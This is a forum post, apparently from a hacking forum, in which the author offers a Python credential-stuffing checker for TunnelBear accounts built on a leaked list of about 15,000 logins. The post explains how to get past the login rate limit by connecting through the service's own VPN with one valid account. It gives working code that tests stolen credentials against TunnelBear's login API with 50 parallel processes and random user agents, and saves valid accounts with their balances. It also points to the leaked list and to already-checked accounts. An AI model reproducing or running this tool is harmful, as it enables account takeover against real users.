Admin please move this thread in correct section (i couldn't find any better place)
So, today i found tunnelbear 15k accounts which got leaked back in june or jule, so it kinda inspired me to write checker, but the problem was, there is rate limit how many accounts can you try per minute
so as i found out, rate limit was somewhere like 6-10 attempts per minute, which is not cool, we don't want to run checker for years right?
using proxy? nah, too slow, we need something better, and idea was born ?
all you need to do is to find one account manually which is valid from the list, and once you have it, download VPN and turn that on
misconfiguration in their servers allows you to attempt login as many times as you want, idk why this happens, probably because vpn servers are considered as their servers but the filter can't tell difference if it's microservice from project or server from vpn (i guess), anyway we do not care about that, we're happy that they have issue, so we can check accounts
Here's code i wrote for checking
(if you'll see connection warning too often, try to lower the threads from 50 to 25 for example)
After few seconds you'll have +100 accounts, in attachments you can find accounts list (Unchecked)
First 400 Checked accounts: https://xss.pro/threads/58965/
Enjoy
So, today i found tunnelbear 15k accounts which got leaked back in june or jule, so it kinda inspired me to write checker, but the problem was, there is rate limit how many accounts can you try per minute
so as i found out, rate limit was somewhere like 6-10 attempts per minute, which is not cool, we don't want to run checker for years right?
using proxy? nah, too slow, we need something better, and idea was born ?
all you need to do is to find one account manually which is valid from the list, and once you have it, download VPN and turn that on
misconfiguration in their servers allows you to attempt login as many times as you want, idk why this happens, probably because vpn servers are considered as their servers but the filter can't tell difference if it's microservice from project or server from vpn (i guess), anyway we do not care about that, we're happy that they have issue, so we can check accounts
Here's code i wrote for checking
Python:
import requests
from random import randint
from time import sleep as s
import json
from multiprocessing import Pool
def check(account):
username = account[0]
password = account[1]
ua_list = ["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763",
"Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36",
"Mozilla/5.0 (Linux; Android 11; SM-A426U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.3229.169 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.1329.192 Safari/537.36"]
url = "https://prod-api-core.tunnelbear.com/core/web/api/login"
data = f'username={username}&password={password}&withUserDetails=true&v=web-1.0"'
headers = {"authority": "prod-api-core.tunnelbear.com",
"content-type": "application/x-www-form-urlencoded",
"accept":"application/json, text/plain, */*",
"user-agent": ua_list[randint(0,len(ua_list)-1)]} # Random UA
try:
response = requests.post(url=url, data=data, headers=headers)
code = response.status_code
body = response.text
if code == 200:
user_data = json.loads(body)
acc_type = user_data['details']['bearType']
balance = str(float(user_data['details']['dataCap']) / 1024 / 1024) + " MB" # Bytes To MB
checked = open('result.txt', "a") # PY 3 doesn't lock files, so why not
checked.write(f'{username}:{password} {balance} {acc_type}\n')
checked.close()
else:
pass
except:
print("[#] - Connection issue, check VPN and connection")
if __name__ == '__main__':
f = open("accounts.txt", "r", encoding="UTF-8")
content = f.read().split("\n")
f.close()
accounts = []
for line in content:
if len(line) > 25:
uname_pass = line.split("|")[0]
accounts.append(uname_pass.strip().split(":"))
with Pool(50) as p: # BECAUSE I CAN
p.map(check, accounts)
checked.close()(if you'll see connection warning too often, try to lower the threads from 50 to 25 for example)
After few seconds you'll have +100 accounts, in attachments you can find accounts list (Unchecked)
First 400 Checked accounts: https://xss.pro/threads/58965/
Enjoy